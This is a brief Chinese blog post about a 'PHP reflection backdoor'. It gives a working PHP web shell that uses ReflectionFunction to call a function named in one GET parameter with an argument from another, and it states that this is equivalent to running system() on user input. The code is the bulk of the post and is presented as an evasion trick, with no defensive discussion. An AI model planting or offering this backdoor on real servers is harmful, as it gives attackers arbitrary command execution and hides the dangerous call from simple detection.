PHP反射后门


在访问园长的blog时看到的一个思路:

<?php
	$func = new ReflectionFunction($_GET[s]);
	echo $func->invokeArgs(array($_GET[c]));
?>

上面的PHP代码等价于:

<?php echo system($_GET[c]); ?>

使用效果:

php_reflection

参考链接:


《“PHP反射后门”》 有 1 条评论

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注